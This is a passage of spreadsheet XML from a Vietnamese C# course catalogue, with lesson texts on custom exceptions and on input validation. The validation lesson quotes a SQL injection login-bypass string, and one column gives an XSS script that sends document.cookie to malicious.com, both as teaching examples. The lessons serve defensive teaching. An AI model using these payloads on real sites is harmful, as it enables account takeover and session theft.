          <t>Cây kế thừa: nút InsufficientFundsException được vẽ thêm dưới Exception. Thẻ đối tượng exception hiện Message, Balance, Amount. Đường đi throw (từ Withdraw) → catch (ở Main) tô màu.</t>
        </is>
      </c>
      <c r="K25" s="10" t="inlineStr">
        <is>
          <t>H06, H03, H07</t>
        </is>
      </c>
      <c r="L25" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M25" s="10" t="inlineStr">
        <is>
          <t>Khai báo class InsufficientFundsException : Exception → cây thêm nút mới.
Constructor nhận balance, amount và gọi : base("Số dư không đủ") → Message được đặt ở lớp cha.
Withdraw(500) khi Balance = 200 → điều kiện amount &gt; Balance đúng → throw new InsufficientFundsException(200, 500).
Thẻ đối tượng: Message, Balance = 200, Amount = 500.
Ở Main, catch (InsufficientFundsException ex) khớp → in "Thiếu 300".
Xong.</t>
        </is>
      </c>
      <c r="N25" s="10" t="inlineStr">
        <is>
          <t>Số dư 200, rút 500</t>
        </is>
      </c>
      <c r="O25" s="10" t="inlineStr">
        <is>
          <t>Exception tùy chỉnh là một lớp kế thừa Exception, có thể thêm thuộc tính riêng; tên kết thúc bằng 'Exception'.</t>
        </is>
      </c>
      <c r="P25" s="10" t="inlineStr">
        <is>
          <t>Khuyến nghị có thêm các constructor chuẩn (không tham số; message; message + innerException); mô phỏng chỉ dùng một constructor cho gọn.</t>
        </is>
      </c>
      <c r="Q25" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/huong-dan-tao-customexception/index.html</t>
        </is>
      </c>
      <c r="R25" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/huong-dan-tao-customexception/</t>
        </is>
      </c>
      <c r="S25" s="10" t="n"/>
      <c r="T25" s="12" t="n"/>
      <c r="U25" s="12" t="n"/>
      <c r="V25" s="21" t="inlineStr">
        <is>
          <t>Quy trình xây dựng Custom Exception trong C#
Để tạo ra một ngoại lệ tùy chỉnh, bạn cần thực hiện theo các quy tắc thiết kế chuẩn mà .NET đã quy định. Một ngoại lệ tùy chỉnh thực chất là một lớp (class) kế thừa từ lớp System.Exception hoặc các lớp dẫn xuất của nó.
Các bước tạo một lớp ngoại lệ tùy chỉnh
Cấu trúc cơ bản của một lớp ngoại lệ cần tuân thủ các quy chuẩn để đảm bảo tính tương thích với các công cụ gỡ lỗi và logging của hệ thống. Dưới đây là các bước thực hiện:
Kế thừa từ Exception: Luôn kế thừa trực tiếp hoặc gián tiếp từ System.Exception.
Đặt tên có hậu tố "Exception": Theo quy ước đặt tên (naming convention) của C#, mọi lớp ngoại lệ nên kết thúc bằng chữ "Exception".
Cung cấp đủ các hàm khởi tạo (Constructors): Một ngoại lệ chuẩn thường cần ít nhất ba hàm khởi tạo cơ bản để hỗ trợ việc truyền thông điệp lỗi và nguyên nhân gốc rễ (InnerException).
Ví dụ về việc tạo một ngoại lệ cho lỗi liên quan đến số dư tài khoản:
public class InsufficientFundsException : Exception
{
    public InsufficientFundsException() { }
    public InsufficientFundsException(string message) 
        : base(message) { }
    public InsufficientFundsException(string message, Exception inner) 
        : base(message, inner) { }
}
Triển khai thông tin bổ sung trong ngoại lệ
Sức mạnh thực sự của Custom Exception nằm ở khả năng lưu trữ các thông tin ngữ cảnh cụ thể mà các ngoại lệ hệ thống không có. Bạn có thể thêm các thuộc tính (properties) để giúp người gọi (caller) xử lý lỗi một cách thông minh hơn.
Giả sử bạn đang xây dựng hệ thống ngân hàng, thay vì chỉ truyền một chuỗi tin nhắn, bạn có thể truyền kèm số tiền khả dụng:
public class InsufficientFundsException : Exception
{
    public decimal AvailableBalance { get; }
    public InsufficientFundsException(string message, decimal availableBalance) 
        : base(message)
    {
        AvailableBalance = availableBalance;
    }
}
Với cách này, khi bắt lỗi, người dùng không chỉ thấy tin nhắn "Không đủ tiền", mà code xử lý có thể truy cập thuộc tính AvailableBalance để gợi ý cho người dùng số tiền tối đa họ có thể rút.
Thực hành "Throw" ngoại lệ tùy chỉnh
Khi ngoại lệ đã được định nghĩa, việc sử dụng nó cũng giống như cách bạn dùng các ngoại lệ có sẵn. Tuy nhiên, cần lưu ý về thời điểm và điều kiện để ném ngoại lệ (throw).
Lưu ý quan trọng: Chỉ nên ném ngoại lệ khi chương trình thực sự rơi vào trạng thái "không thể tiếp tục thực thi logic nghiệp vụ". Tránh sử dụng ngoại lệ để điều khiển luồng chương trình thông thường (như thay thế câu lệnh if-else).
public void Withdraw(decimal amount)
{
    decimal balance = GetAccountBalance();
    if (amount &gt; balance)
    {
        // Ném ngoại lệ tùy chỉnh với thông tin bổ sung
        throw new InsufficientFundsException("Số dư không đủ để thực hiện giao dịch.", balance);
    }
    // Tiếp tục logic rút tiền...
}
Xử lý (Catch) ngoại lệ tùy chỉnh một cách chọn lọc
Khi sử dụng ngoại lệ tùy chỉnh, bạn có thể tạo ra các khối catch chuyên biệt. Điều này giúp mã nguồn phân tách rõ ràng giữa việc xử lý lỗi hệ thống (như IOException) và lỗi logic nghiệp vụ (InsufficientFundsException).
try
{
    account.Withdraw(5000000);
}
catch (InsufficientFundsException ex)
{
    Console.WriteLine($"Lỗi nghiệp vụ: {ex.Message}");
    Console.WriteLine($"Số dư hiện tại của bạn là: {ex.AvailableBalance:C}");
}
catch (Exception ex)
{
    // Xử lý các lỗi không lường trước được
    Logger.Log(ex);
}
Các lưu ý về tính bảo mật và hiệu suất
Khi thiết kế Custom Exception, cần ghi nhớ một số điểm sau để đảm bảo chất lượng ứng dụng:
Không chứa dữ liệu nhạy cảm: Tránh đưa mật khẩu, thông tin cá nhân (PII) hoặc các khóa bảo mật vào nội dung thông điệp lỗi (message), vì các thông tin này thường được ghi vào log file – nơi có nguy cơ bị lộ thông tin cao.
Độ phức tạp: Đừng lạm dụng tạo ra quá nhiều lớp ngoại lệ. Nếu một tình huống lỗi không cần xử lý riêng biệt (tức là bạn không có hành động catch đặc thù nào cho nó), hãy cân nhắc sử dụng các ngoại lệ có sẵn của .NET với thông điệp tùy chỉnh.
Serialization: Nếu ứng dụng của bạn cần truyền tải ngoại lệ qua các tiến trình hoặc mạng (ví dụ: WCF, Remoting), hãy đánh dấu lớp ngoại lệ của bạn là [Serializable] và triển khai constructor cho Serialization, mặc dù điều này ít phổ biến hơn trong các ứng dụng web hiện đại.
Việc tạo ra các Custom Exception rõ ràng không chỉ làm cho mã nguồn trở nên tự giải thích (self-documenting) mà còn tạo ra một "hợp đồng" lỗi chặt chẽ giữa các tầng trong ứng dụng của bạn.</t>
        </is>
      </c>
      <c r="W25" s="22" t="inlineStr">
        <is>
          <t># Hướng dẫn tạo CustomException
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Viết một lớp ngoại lệ tùy chỉnh kế thừa từ `Exception`.
- Dùng `: base(...)` để đặt `Message` ở lớp cha.
- Thêm thuộc tính riêng như `Balance` và `Amount` vào exception.
- Ném (`throw`) và bắt (`catch`) ngoại lệ tùy chỉnh theo kiểu.
- Quan sát ngoại lệ được khai báo, ném ra và bắt lại bằng hoạt động mô phỏng.
## Các bước tạo ngoại lệ tùy chỉnh
1. Tạo lớp **kế thừa** từ `Exception`.
2. Đặt tên kết thúc bằng **`Exception`** để dễ nhận ra.
3. Viết constructor, gọi `: base("thông điệp")` để đặt `Message`.
4. (Tùy chọn) Thêm thuộc tính riêng để mang dữ liệu nghiệp vụ.
## Khai báo lớp InsufficientFundsException
```csharp
using System;
public class InsufficientFundsException : Exception
{
    public decimal Balance { get; }
    public decimal Amount { get; }
    public InsufficientFundsException(decimal balance, decimal amount)
        : base("Số dư không đủ")
    {
        Balance = balance;
        Amount = amount;
    }
}
```
- `: Exception` khiến lớp này trở thành một exception, nên có thể `throw` và `catch`.
- `: base("Số dư không đủ")` đặt `Message` ở lớp cha `Exception`.
- `Balance` và `Amount` là hai thuộc tính riêng, chỉ đọc từ bên ngoài, được gán trong constructor.
## Ném và bắt ngoại lệ tùy chỉnh
Lớp `Account` kiểm tra số dư rồi ném exception khi rút quá số dư:
```csharp
using System;
public class Account
{
    public decimal Balance = 200;
    public void Withdraw(decimal amount)
    {
        if (amount &gt; Balance)
        {
            throw new InsufficientFundsException(Balance, amount);
        }
        Balance -= amount;
    }
}
public class Program
{
    public static void Main()
    {
        var acc = new Account();
        try
        {
            acc.Withdraw(500);
        }
        catch (InsufficientFundsException ex)
        {
            Console.WriteLine("Thiếu " + (ex.Amount - ex.Balance));
        }
    }
}
// Thiếu 300
```
`catch (InsufficientFundsException ex)` chỉ bắt đúng loại lỗi này. Các lỗi khác vẫn đi tiếp lên trên, hoặc bị một `catch (Exception)` phía sau bắt nếu có.
## Hoạt động: Khai báo, ném và bắt
Mô phỏng dưới đây chạy cả đoạn mã gồm lớp `InsufficientFundsException`, lớp `Account` và đoạn `try/catch`. Bên trên là cây kế thừa của exception. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Số dư 200, rút 500**. Dòng `: Exception` thêm một nút mới `InsufficientFundsException` ("do ta tạo") vào cây kế thừa, bên cạnh `FormatException` và `InvalidOperationException` có sẵn.
- Constructor gọi `: base("Số dư không đủ")`, nên `Message` được đặt ở lớp cha. Thẻ mô tả đối tượng sẽ tạo ra còn `Balance` và `Amount` ở trạng thái "chờ gán".
- `Withdraw(500)` kiểm tra `amount 500 &gt; Balance 200` là đúng, nên chạy lệnh `throw new`. Hình ngăn xếp lời gọi cho thấy `Main` đang gọi `Withdraw`.
- Đối tượng exception được tạo: `Balance = 200`, `Amount = 500` được gán, `Message` là "Số dư không đủ". Thẻ lỗi đỏ hiện đủ ba dòng dữ liệu.
- Exception rời `Withdraw`, đi lên `Main` và khớp `catch (InsufficientFundsException ex)` (nút trên cây sáng xanh).
- `ex.Amount - ex.Balance = 500 - 200 = 300`, chương trình in "Thiếu 300".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/huong-dan-tao-customexception/" title="Tạo một CustomException" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: ngoại lệ tùy chỉnh là một lớp kế thừa `Exception`, có thể thêm thuộc tính riêng. Nhờ vậy phần `catch` biết chính xác lỗi gì và có đủ dữ liệu để xử lý.
## Lưu ý khi thiết kế
- **Tên:** kết thúc bằng `Exception`, ví dụ `InsufficientFundsException`.
- **Thông điệp:** viết rõ ràng, nhưng đừng đưa thông tin nhạy cảm (mật khẩu, số thẻ) vào `Message`.
- **Dữ liệu:** chỉ thêm thuộc tính thật sự cần cho người xử lý lỗi.
- **Hiệu suất:** exception chậm hơn so với `if`. Đừng dùng nó cho luồng chạy bình thường, chỉ dùng cho tình huống bất thường.
## Vì sao dùng thuộc tính chỉ đọc?
`Balance` và `Amount` chỉ có `get`, được gán một lần trong constructor. Exception mô tả một sự việc đã xảy ra, nên dữ liệu của nó không nên bị sửa sau đó. Đây cũng là cách dùng đóng gói (encapsulation) quen thuộc từ bài OOP.
Lớp ngoại lệ cũng có thể thêm các constructor khác, ví dụ nhận thêm một `Exception innerException` để giữ lại lỗi gốc. Với mức cơ bản, một constructor như trên là đủ.
## Tóm tắt
- Ngoại lệ tùy chỉnh là lớp kế thừa từ `Exception`, đặt tên kết thúc bằng `Exception`.
- Dùng `: base("...")` trong constructor để đặt `Message`.
- Thêm thuộc tính riêng (như `Balance`, `Amount`) để mang dữ liệu nghiệp vụ.
- Dùng `throw new ...` để ném và `catch (TênException ex)` để bắt theo kiểu.
- Tránh để thông tin nhạy cảm trong thông điệp, và đừng lạm dụng exception cho luồng bình thường.</t>
        </is>
      </c>
    </row>
    <row r="26" ht="409.6" customHeight="1" s="18">
      <c r="A26" s="10" t="n">
        <v>26</v>
      </c>
      <c r="B26" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C26" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra và Xác thực Dữ liệu Đầu vào</t>
        </is>
      </c>
      <c r="D26" s="10" t="inlineStr">
        <is>
          <t>Tầm quan trọng của xác thực dữ liệu đầu vào</t>
        </is>
      </c>
      <c r="E26" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F26" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G26" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H26" s="10" t="inlineStr">
        <is>
          <t>Thấy dữ liệu sai lọt vào hệ thống gây hậu quả gì khi không được kiểm tra.</t>
        </is>
      </c>
      <c r="I26" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Không xác thực | Có xác thực</t>
        </is>
      </c>
      <c r="J26" s="10" t="inlineStr">
        <is>
          <t>Giữa ô nhập và 'kho dữ liệu' (bảng người dùng) có một cổng kiểm soát. Trái không có cổng: bản ghi tuổi −5, email rỗng lọt vào bảng (tô đỏ). Phải: cổng chặn lại kèm lý do.</t>
        </is>
      </c>
      <c r="K26" s="10" t="inlineStr">
        <is>
          <t>H09, H21</t>
        </is>
      </c>
      <c r="L26" s="10" t="inlineStr">
        <is>
          <t>1 tab: 3 lượt đăng ký</t>
        </is>
      </c>
      <c r="M26" s="10" t="inlineStr">
        <is>
          <t>Đăng ký 1: An, 20, an@x.com → cả hai lưu.
Đăng ký 2: Bình, −5, (email rỗng) → trái lưu bản ghi sai; phải chặn: "Tuổi phải từ 1 đến 120; email không được rỗng".
Đăng ký 3: Chi, 30, chi@x.com → cả hai lưu.
Tính tuổi trung bình: trái (20 − 5 + 30) / 3 = 15 (sai lệch); phải (20 + 30) / 2 = 25.
Xong.</t>
        </is>
      </c>
      <c r="N26" s="10" t="inlineStr">
        <is>
          <t>(An, 20, an@x.com), (Bình, −5, rỗng), (Chi, 30, chi@x.com)</t>
        </is>
      </c>
      <c r="O26" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra ngay ở đầu vào rẻ hơn nhiều so với sửa dữ liệu hỏng về sau.</t>
        </is>
      </c>
      <c r="P26" s="10" t="n"/>
      <c r="Q26" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/tam-quan-trong-cua-xac-thuc-du-lieu-dau-vao/index.html</t>
        </is>
      </c>
      <c r="R26" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/tam-quan-trong-cua-xac-thuc-du-lieu-dau-vao/</t>
        </is>
      </c>
      <c r="S26" s="10" t="n"/>
      <c r="T26" s="12" t="n"/>
      <c r="U26" s="12" t="n"/>
      <c r="V26" s="21" t="inlineStr">
        <is>
          <t>Tại sao xác thực dữ liệu là cần thiết?
Trong mọi ứng dụng phần mềm, dữ liệu đầu vào là cầu nối quan trọng giữa người dùng (hoặc các hệ thống khác) và logic nghiệp vụ của bạn. Tuy nhiên, dữ liệu này thường không đáng tin cậy. Nó có thể đến từ nhiều nguồn khác nhau, được nhập bởi người dùng với nhiều mức độ hiểu biết và ý định, hoặc bị thay đổi một cách vô ý hay cố ý. Chính vì vậy, xác thực dữ liệu đầu vào (input validation) không chỉ là một thực hành tốt mà còn là một yêu cầu bắt buộc để đảm bảo sự ổn định, an toàn và chính xác của ứng dụng.
Xác thực dữ liệu là quá trình kiểm tra xem dữ liệu được cung cấp có tuân thủ các quy tắc, định dạng và ràng buộc đã định trước hay không. Nếu không có bước kiểm tra này, dữ liệu không hợp lệ có thể gây ra hàng loạt vấn đề nghiêm trọng, từ lỗi hiển thị đơn giản đến các lỗ hổng bảo mật nghiêm trọng có thể phá hủy toàn bộ hệ thống.
Ngăn chặn các mối đe dọa bảo mật nghiêm trọng
Một trong những lý do quan trọng nhất để xác thực dữ liệu đầu vào là bảo vệ ứng dụng khỏi các cuộc tấn công bảo mật. Nhiều lỗ hổng phổ biến và nguy hiểm nhất đều bắt nguồn từ việc xử lý dữ liệu đầu vào không được xác thực hoặc được xác thực không đầy đủ.
SQL Injection
Tấn công SQL Injection xảy ra khi kẻ xấu chèn các đoạn mã SQL độc hại vào trường dữ liệu đầu vào của ứng dụng. Nếu ứng dụng xây dựng truy vấn SQL động mà không xác thực hoặc thoát ký tự đặc biệt khỏi dữ liệu đầu vào, cơ sở dữ liệu có thể thực thi mã độc đó.
Ví dụ, nếu ứng dụng của bạn có một form đăng nhập và xây dựng truy vấn như sau:
string query = "SELECT * FROM Users WHERE Username = '" + usernameInput + "' AND Password = '" + passwordInput + "'";
// Thực thi query này
Nếu một kẻ tấn công nhập admin' OR '1'='1 vào trường usernameInput, truy vấn sẽ trở thành:
SELECT * FROM Users WHERE Username = 'admin' OR '1'='1' AND Password = '...'
Mệnh đề OR '1'='1' luôn đúng, cho phép kẻ tấn công đăng nhập mà không cần biết mật khẩu. Xác thực dữ liệu có thể ngăn chặn điều này bằng cách kiểm tra các ký tự đặc biệt hoặc chỉ chấp nhận các ký tự an toàn trước khi chúng được sử dụng để xây dựng truy vấn.
Cross-Site Scripting (XSS)
Tấn công XSS xảy ra khi kẻ tấn công chèn các script độc hại (thường là JavaScript) vào nội dung mà ứng dụng của bạn hiển thị cho người dùng khác. Nếu ứng dụng không xác thực hoặc thoát ký tự đúng cách trước khi hiển thị dữ liệu do người dùng cung cấp, trình duyệt của nạn nhân có thể thực thi script đó.
Ví dụ, nếu một diễn đàn cho phép người dùng đăng bài mà không xác thực nội dung và một kẻ tấn công đăng một bài viết chứa:
&lt;script&gt;alert('Bạn đã bị tấn công!'); window.location='http://malicious.com/?cookie='+document.cookie;&lt;/script&gt;
Khi người dùng khác xem bài viết này, script sẽ được thực thi trong trình duyệt của họ, có thể đánh cắp cookie phiên hoặc chuyển hướng họ đến trang web độc hại. Xác thực dữ liệu đầu vào bằng cách làm sạch (sanitizing) hoặc thoát (escaping) các thẻ HTML và ký tự đặc biệt là cách phòng ngừa hiệu quả.
Bảo vệ logic nghiệp vụ và duy trì tính toàn vẹn dữ liệu
Ngoài các mối đe dọa bảo mật, dữ liệu không hợp lệ còn có thể phá vỡ logic nghiệp vụ của ứng dụng và làm hỏng tính toàn vẹn của dữ liệu.
Vi phạm quy tắc nghiệp vụ: Mọi ứng dụng đều có các quy tắc nghiệp vụ riêng. Ví dụ, tuổi của người dùng phải nằm trong khoảng 18-60, số lượng sản phẩm không được nhỏ hơn 1, hoặc ngày đặt hàng không thể ở trong quá khứ. Nếu không xác thực, người dùng có thể nhập dữ liệu vi phạm các quy tắc này, dẫn đến các tính toán sai lệch, trạng thái ứng dụng không nhất quán hoặc các giao dịch không hợp lệ.
Dữ liệu không chính xác hoặc bị hỏng: Dữ liệu không hợp lệ được lưu trữ vào cơ sở dữ liệu có thể làm hỏng tính toàn vẹn của dữ liệu. Ví dụ, nếu một trường yêu cầu địa chỉ email nhưng lại lưu một chuỗi không đúng định dạng, các tính năng gửi email sau này có thể thất bại. Dữ liệu bị hỏng không chỉ gây khó khăn cho việc sử dụng mà còn có thể lan truyền lỗi sang các hệ thống phụ thuộc khác.
Việc xác thực dữ liệu đảm bảo rằng chỉ dữ liệu tuân thủ các quy tắc đã định mới được xử lý và lưu trữ, giữ cho logic nghiệp vụ hoạt động chính xác và cơ sở dữ liệu luôn sạch sẽ.
Nâng cao độ tin cậy và trải nghiệm người dùng
Xác thực dữ liệu đầu vào không chỉ là phòng thủ mà còn là một yếu tố then chốt để xây dựng một ứng dụng đáng tin cậy và mang lại trải nghiệm người dùng tốt.
Độ tin cậy của ứng dụng: Khi dữ liệu đầu vào được xác thực kỹ lưỡng, ứng dụng ít có khả năng gặp phải các lỗi không mong muốn, ngoại lệ hoặc sự cố. Điều này dẫn đến một hệ thống ổn định hơn, ít bị sập hoặc ngừng hoạt động, từ đó tăng cường niềm tin của người dùng vào ứng dụng của bạn. Các lỗi được phát hiện sớm ở giai đoạn nhập liệu sẽ không bao giờ có cơ hội gây ra lỗi nghiêm trọng hơn ở các tầng sâu hơn của ứng dụng.
Trải nghiệm người dùng tốt hơn: Thay vì để người dùng gửi dữ liệu không hợp lệ đến máy chủ và nhận lại thông báo lỗi khó hiểu (hoặc tệ hơn là không có phản hồi), xác thực dữ liệu cho phép bạn cung cấp phản hồi tức thì và rõ ràng. Ví dụ, nếu người dùng nhập một địa chỉ email sai định dạng, ứng dụng có thể ngay lập tức hiển thị thông báo "Email không hợp lệ, vui lòng kiểm tra lại". Điều này giúp người dùng sửa lỗi nhanh chóng, giảm sự thất vọng và hướng dẫn họ nhập dữ liệu chính xác, cải thiện đáng kể trải nghiệm tổng thể.
Kết luận
Xác thực dữ liệu đầu vào là một phần không thể thiếu của quá trình phát triển phần mềm an toàn và mạnh mẽ. Bằng cách thực hiện xác thực một cách cẩn thận và toàn diện, bạn không chỉ bảo vệ ứng dụng của mình khỏi các mối đe dọa bảo mật nguy hiểm mà còn đảm bảo tính toàn vẹn của dữ liệu, duy trì hoạt động chính xác của logic nghiệp vụ và cung cấp một trải nghiệm người dùng mượt mà, đáng tin cậy. Đầu tư vào xác thực dữ liệu là đầu tư vào sự bền vững và thành công lâu dài của ứng dụng.</t>
        </is>
      </c>
      <c r="W26" s="22" t="inlineStr">
        <is>
          <t># Tầm quan trọng của xác thực dữ liệu đầu vào
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích xác thực dữ liệu đầu vào (input validation) là gì và vì sao không thể thiếu.
- Nhận ra hai mối đe dọa bảo mật điển hình khi không kiểm tra dữ liệu: SQL Injection và XSS.
- Kể ra các hậu quả với quy tắc nghiệp vụ, dữ liệu và trải nghiệm người dùng.
- Viết một hàm kiểm tra đơn giản đặt ở "cổng" trước khi lưu dữ liệu.
- Quan sát bằng hoạt động mô phỏng một bản ghi sai lọt vào kho dữ liệu, và bị chặn khi có xác thực.
## Dữ liệu đầu vào không đáng tin
Mọi ứng dụng đều nhận dữ liệu từ bên ngoài: người dùng gõ vào ô nhập, tệp được tải lên, một hệ thống khác gửi sang. Những dữ liệu này có thể thiếu, sai định dạng, vô tình nhập nhầm, hoặc bị cố ý chỉnh sửa để phá hệ thống.
**Xác thực dữ liệu đầu vào (input validation)** là bước kiểm tra xem dữ liệu có tuân theo quy tắc, định dạng và ràng buộc đã đặt ra hay không, **trước khi** dùng hoặc lưu nó. Nếu bỏ qua bước này, dữ liệu sai sẽ đi sâu vào hệ thống, và hậu quả đi từ lỗi hiển thị nhỏ đến lỗ hổng bảo mật nghiêm trọng.
Nguyên tắc cần nhớ: **không tin dữ liệu từ bên ngoài, kiểm tra ngay tại cửa vào**.
## Ngăn chặn mối đe dọa bảo mật
Nhiều lỗ hổng phổ biến bắt nguồn từ dữ liệu không được kiểm tra hoặc xử lý đúng cách.
### SQL Injection
**SQL Injection** xảy ra khi kẻ xấu chèn mã SQL vào ô nhập, và ứng dụng ghép nguyên chuỗi đó vào câu truy vấn. Ví dụ, một ứng dụng viết:
```csharp
// KHÔNG làm như vậy: ghép chuỗi người dùng nhập vào câu truy vấn
string query = "SELECT * FROM Users WHERE Username = '" + usernameInput
             + "' AND Password = '" + passwordInput + "'";
```
Nếu kẻ tấn công nhập `admin' OR '1'='1` vào `usernameInput`, câu truy vấn trở thành:
```sql
SELECT * FROM Users WHERE Username = 'admin' OR '1'='1' AND Password = '...'
```
Vế `'1'='1'` luôn đúng, nên kẻ tấn công có thể vượt qua bước đăng nhập mà không cần biết mật khẩu. Cách phòng đúng là kết hợp kiểm tra dữ liệu với **truy vấn có tham số** (parameterized query), để dữ liệu luôn được coi là giá trị chứ không phải mã SQL.
### Cross-Site Scripting (XSS)
**XSS** xảy ra khi kẻ tấn công chèn đoạn script (thường là JavaScript) vào nội dung mà ứng dụng hiển thị cho người khác, chẳng hạn một bài đăng trên diễn đàn. Khi người khác mở bài đó, trình duyệt của họ chạy script, và có thể bị đánh cắp phiên đăng nhập hoặc bị chuyển sang trang độc hại. Cách phòng là **mã hóa (escape)** các ký tự HTML đặc biệt trước khi hiển thị và kiểm tra nội dung đầu vào.
## Bảo vệ quy tắc nghiệp vụ và dữ liệu
Ngay cả khi không có kẻ tấn công, dữ liệu sai vẫn gây hại:
- **Vi phạm quy tắc nghiệp vụ:** tuổi âm, số lượng sản phẩm bằng 0, ngày đặt hàng ở quá khứ. Các phép tính sau đó cho kết quả sai, và trạng thái ứng dụng không còn nhất quán.
- **Dữ liệu bị hỏng:** một chuỗi không đúng dạng email vẫn được lưu, và về sau chức năng gửi thư thất bại. Dữ liệu hỏng còn lan sang các hệ thống khác dùng chung nó.
Xác thực bảo đảm chỉ dữ liệu đúng quy tắc mới được xử lý và lưu, nên kho dữ liệu luôn "sạch".
## Độ tin cậy và trải nghiệm người dùng
- **Ứng dụng ổn định hơn:** lỗi được chặn ngay ở đầu vào sẽ không có cơ hội gây ngoại lệ ở các tầng sâu hơn.
- **Phản hồi rõ ràng:** thay vì thông báo lỗi khó hiểu (hoặc không phản hồi gì), người dùng thấy ngay "Email không hợp lệ, vui lòng kiểm tra lại" và sửa được nhanh.
## Một cổng kiểm tra đơn giản
Dưới đây là ví dụ đăng ký người dùng với hàm `IsValid` đóng vai trò cổng kiểm tra. Đây cũng là chương trình mà hoạt động mô phỏng bên dưới sẽ chạy:
```csharp
using System;
using System.Collections.Generic;
using System.Linq;
public class Program
{
    static List&lt;(string Name, int Age, string Email)&gt; users = new();
    static bool IsValid(int age, string email)
        =&gt; age &gt;= 1 &amp;&amp; age &lt;= 120 &amp;&amp; email != "";
    static void Register(string name, int age, string email)
    {
        if (!IsValid(age, email))
        {
            Console.WriteLine("Bị chặn");
            return;
        }
        users.Add((name, age, email));
    }
    public static void Main()
    {
        Register("An", 20, "an@x.com");
        Register("Bình", -5, "");          // Bị chặn
        Register("Chi", 30, "chi@x.com");
        var avg = users.Average(u =&gt; u.Age);
        Console.WriteLine(avg);            // 25
    }
}
```
Nếu bỏ lệnh `if (!IsValid(...))`, bản ghi của Bình vẫn được lưu, và tuổi trung bình sẽ là 15 thay vì 25.
## Hoạt động: Ba lượt đăng ký
Mô phỏng dưới đây có hai cột chạy song song với cùng ba lượt đăng ký. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **3 lượt đăng ký**. Cột trái là **Không xác thực**: mọi thứ nhập vào đều được lưu. Cột phải là **Có xác thực**: có một "cổng" trước kho dữ liệu.
- Ở lượt 1 (An, 20 tuổi, `an@x.com`) và lượt 3 (Chi, 30 tuổi, `chi@x.com`), cả hai cột đều lưu bản ghi vào kho vì dữ liệu hợp lệ.
- Ở lượt 2 (Bình, tuổi -5, email rỗng), cột trái vẫn lưu bản ghi này và bản ghi hiện màu đỏ trong kho. Cột phải thì cổng chuyển sang đỏ, `IsValid` trả về `false`, và Bình nằm ở ngăn **Bị chặn** với lý do "Tuổi phải từ 1 đến 120; email không được rỗng". Dòng "Bị chặn" được in ra.
- Cuối cùng, hãy so sánh tuổi trung bình. Cột trái ra **15** (tính từ 20, -5, 30 nên bị lệch, hiện màu đỏ). Cột phải ra **25** (tính từ 20 và 30, hiện màu xanh).
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/tam-quan-trong-cua-xac-thuc-du-lieu-dau-vao/" title="Tại sao phải xác thực đầu vào?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: một bản ghi sai lọt vào kho sẽ làm sai cả kết quả thống kê phía sau. Kiểm tra ngay ở đầu vào rẻ hơn nhiều so với sửa dữ liệu hỏng về sau.
## Tóm tắt
- **Xác thực đầu vào** là kiểm tra dữ liệu theo quy tắc trước khi dùng hoặc lưu.
- Dữ liệu từ bên ngoài luôn có thể sai hoặc độc hại, nên cần kiểm tra ngay tại cửa vào.
- **SQL Injection** và **XSS** là các tấn công điển hình khi bỏ qua kiểm tra; phòng bằng truy vấn có tham số và mã hóa HTML.
- Dữ liệu sai làm hỏng quy tắc nghiệp vụ, kho dữ liệu và các phép tính phụ thuộc.
- Xác thực tốt giúp ứng dụng ổn định và cho người dùng phản hồi rõ ràng, kịp thời.</t>
        </is>
      </c>
    </row>
    <row r="27" ht="409.6" customHeight="1" s="18">
      <c r="A27" s="10" t="n">
        <v>27</v>
      </c>
      <c r="B27" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C27" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra và Xác thực Dữ liệu Đầu vào</t>
        </is>
      </c>
      <c r="D27" s="10" t="inlineStr">
        <is>
          <t>Các kỹ thuật xác thực dữ liệu: Kiểm tra null, rỗng, định dạng, phạm vi</t>
        </is>
      </c>
      <c r="E27" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F27" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G27" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H27" s="10" t="inlineStr">
        <is>
